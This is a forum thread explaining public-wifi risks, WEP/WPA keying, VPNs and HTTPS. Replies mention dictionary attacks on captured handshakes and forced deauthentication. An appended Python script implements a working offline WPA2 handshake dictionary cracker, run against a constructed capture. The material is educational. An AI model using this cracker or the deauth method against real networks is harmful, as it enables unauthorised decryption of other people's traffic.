Wireless security issues doubt

Techknowledge

Member
Jul 15, 2013
I am told that if I connect to a public wifi and then surf the net, I'm not really secure. Can someone explain in simple English why and how? My understanding is that the information is in the air (i.e. using wireless to communicate) and hence there are programs that sniff this information (can someone give a practical example that I can try, and use these programs to see how the information is readily clear)?

Second question is, how then should I ensure the information in the air (wirelessly) is encrypted? I believe by the use of a VPN or SSH, but again, if I have neither, how can I ensure my information is encrypted from sniffers?

Lastly, by connecting to a VPN or SSH, doesn't it also mean my computer connects to a VPN and then anything from the VPN or SSH is secured? What about from the computer to the VPN (there the information is also in the air, right?), so only once it connects to the VPN does the information become encrypted. I would appreciate an answer to each of the questions and doubts to make it clear for me :) Thank you
 

PrincessFrosty

Platinum Member
Feb 13, 2008
www.frostyhacks.blogspot.com
Different types of wifi protection work in different ways, so it depends.

WEP uses a single key to encrypt everyone's data, and that's based off the passphrase; if you know the passphrase (or there isn't one) then you can simply read the traffic to/from anyone connected to the access point. WEP is even more insecure than that, because you can find the hashed version of the key in just a few minutes anyway.

WPA is slightly different: each session is encrypted with a unique key that's built partially from the password and partially from other data, including random data exchanged when you connect.

If you have an open WPA network or you're sharing a password, you can't simply read other people's traffic; you need to know the other information that is used to build their key. If you capture the handshake of a person connecting to the wifi, however, you can use that handshake along with the known password to find the session key and then decrypt everything onward.

VPNs and SSH typically tunnel data encrypted across a network (any network); it could be read on an unsecured wifi, but you'd just see gibberish unless you knew the encryption key the VPN was using, to decrypt it with.

There are many different ways of encrypting data on the fly, and it depends on the type of data you want to send/receive; for example, HTTPS encrypts web traffic, so if you want to use a public wifi simply for surfing, you'd have to make sure you browse sites that support HTTPS.

VPN tunneling is usually done from the physical device as the start point and ends at a provider of some sort; everything along it is encrypted, and only the stretch from the exit node of the provider to the destination is left unencrypted (by the VPN).
 

PrincessFrosty

Platinum Member
Feb 13, 2008
www.frostyhacks.blogspot.com
It's worth noting that WPA attacks are possible in the wild; they're open to offline dictionary attacks where you capture the 4-way handshake between a client and the access point, and any weak password in a dictionary table will be found.

It can also be found via WPS attacks if WPS is enabled.

Once you have the password you don't have to wait for a client to connect to grab their handshake; you can spoof disconnect packets from the access point to the client, forcing them to reconnect and do another handshake, so attacks like this are very practical.
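The two mechanisms described in the posts above (the per-client WPA session key built from the password plus the nonces and MAC addresses exchanged at connection time, and the offline dictionary attack against a captured 4-way handshake) in one worked example. This is Python added to the thread, not code from either poster. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed for the demonstration, and the "captured" EAPOL message 2 is built locally rather than sniffed off the air; the deauth trick in the last post only changes how you obtain that frame, not what you do with it.

```python
"""WPA2-PSK key derivation and the offline dictionary attack on a captured
4-way handshake. Example code added to this thread, not from the original
posts. SSID, MACs, nonces, passphrase and wordlist are all constructed."""
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1 over the passphrase, salted with
    the SSID, 4096 iterations, 256 bits. This is the slow step of every guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_802_11(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key: PMK mixed with both MACs and both nonces.
    This is the 'other information' each client's session key depends on."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_802_11(pmk, b"Pairwise key expansion", data, 64)


MIC_OFFSET = 81  # 802.1X header (4) + EAPOL-Key fields preceding the MIC (77)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Message-2 MIC for key descriptor version 2: HMAC-SHA1 over the frame with the
    MIC field zeroed, truncated to 16 bytes. KCK is the first 16 bytes of the PTK."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) with an empty key-data field."""
    body = (bytes([2])                        # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")     # key info: version 2, pairwise, MIC present
            + (16).to_bytes(2, "big")         # key length (CCMP)
            + (1).to_bytes(8, "big")          # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + mic + (0).to_bytes(2, "big"))   # MIC, key data length
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # 802.1X v2, type EAPOL-Key


def sniffed_handshake(passphrase, ssid, ap_mac, client_mac, anonce, snonce) -> bytes:
    """What a passive sniffer sees in message 2: the client's nonce plus a MIC computed
    under the real PTK. Constructed here; in the wild this frame comes off the air."""
    ptk = wpa2_ptk(wpa2_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return build_msg2(snonce, eapol_mic(ptk[:16], build_msg2(snonce)))


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: re-derive PMK -> PTK -> MIC for each guess and compare
    with the captured MIC. Returns (passphrase, TK) on a hit, else None."""
    captured = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        ptk = wpa2_ptk(wpa2_pmk(guess, ssid), ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), captured):
            return guess, ptk[32:48]  # TK: the key that decrypts this client's data frames
    return None


# Constructed capture. Nonces are fixed so the run is repeatable; real ones are random,
# which is why knowing the password alone does not let you read another client's traffic.
SSID = "coffeeshop"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "summer2013"
MSG2 = sniffed_handshake(REAL_PASSPHRASE, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
WORDLIST = ["password", "letmein", "coffeeshop", "summer2013", "hunter2"]


def demo():
    return crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, MSG2, WORDLIST)


if __name__ == "__main__":
    hit = demo()
    print("recovered passphrase:", hit[0], "TK:", hit[1].hex())
```

Two things the run makes concrete. First, the attacker needs all of the SSID, both MAC addresses, both nonces and a MIC before a guess can be checked, which is exactly what a captured (or forced) handshake supplies; with the password already known, the same derivation hands over that client's TK and everything after the handshake is readable. Second, every guess costs 4096 HMAC-SHA1 iterations in `wpa2_pmk`, so the only thing standing between a captured handshake and the key is the passphrase not being in the attacker's wordlist.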